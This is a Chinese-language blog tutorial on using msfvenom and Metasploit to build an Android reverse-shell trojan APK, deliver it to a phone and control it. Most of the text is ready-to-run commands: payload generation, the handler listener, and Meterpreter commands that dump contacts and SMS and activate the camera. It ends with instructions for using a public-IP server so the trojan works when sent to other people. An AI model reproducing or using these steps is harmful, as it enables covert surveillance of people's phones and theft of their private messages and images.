Msfvenom是Metasploit独立的有效载荷生成器,也是msf有效载荷和msphencode的替代品。MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencode,常用于生成木马,在目标机器上执行,在本地机器kali中上线
实验目的
用msfvenom生成一个安卓手机下可执行木马akp的文件,用kali监听,实现控制安卓手机
实验环境
- 攻击机:kali linux(192.168.72.133)
- 靶机:安卓手机(雷电模拟器)
- 工具:Metasploit和msfvenom
- 环境:同一局域网
查看所有--payload的模块
msfvenom -l payloads
首先使用msfvenom生成一个可以被安卓执行的apk木马文件
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.72.133 LPORT=6666 R > qyyx.apk
192.168.72.133
是kali的IP地址6666
是选择kali监听的端口qyyx.apk
是生成apk文件
# 启动metasploit渗透框架
msfconsole
# 使用侦听模块
use exploit/multi/handler
# 加载payload攻击模块
set payload android/meterpreter/reverse_tcp
# 设置kali的ip
set LHOST 192.168.72.133
# 设置kali的端口
set LPORT 6666
# 查看参数设置
show options
# 开始监听
run
接下来就可以把qyyx.apk木马文件发送给手机了
只要手机安装并且运行,shell就会反弹到kali中
怎么将kali生成的apk拿出来?有两个方法
- 第一个方法是启动kali的apache
systemctl start apache2
把apk文件放到/var/www/html/目录下,雷电模拟器中访问kali的ip加文件名字
192.168.72.133/qyyx.apk就可以下载了 - 第二个方法是打开kali自带的火狐浏览器上传到网盘中
在雷电模拟器安装后点击一下(不会有任何反应的)
而kali这边已经显示成功了,因为模拟器没有摄像头 通讯录等等,只能获取手机信息
可输入的命令有(获取到的文件都在kali的root目录下)
sysinfo //查看手机信息
webcam_list //查看手机有多少个摄像头
webcam_stream //开启实时摄像头
webcam_snap //拍照片
dump_contacts //导出电话号码
dump_sms //导出信息
进阶玩法
我们把木马给其他人运行时发现kali这边没反应
因为生成木马用的是内网地址,不在同一网段,shell没法反弹
所以我们可以选择一个有公网IP的机器,让shell反弹给攻击机
有公网ip的机器可以是内网穿透节点,也可以是攻击机
之前写过内网穿透的教程了,现在就用服务器当攻击机演示
在centos7下安装Metasploit
yum install wget -y
wget https://rpm.metasploit.com/metasploit-omnibus/pkg/metasploit-framework-6.1.37%2B20220402102547~1rapid7-1.el6.x86_64.rpm
rpm -i metasploit-framework-6.1.37+20220402102547~1rapid7-1.el6.x86_64.rpm
安装之后,就从上面生成木马开始执行代码一路执行,不同的是监听ip,要换成服务器的公网ip
关于进阶玩法详细内容,请看Linux下安装nginx:https://blog.aerr.cn/1888.html
Comments 2 条评论
博主 ZhaoQuinn
现在都已经自带隐私防护了 意义不大
博主 青云依兮
@ZhaoQuinn 只要给了权限,还是可以的,现在app获取照片摄像头之类的敏感权限都是弹窗出来让你授权的,所以自己还是要斟酌一下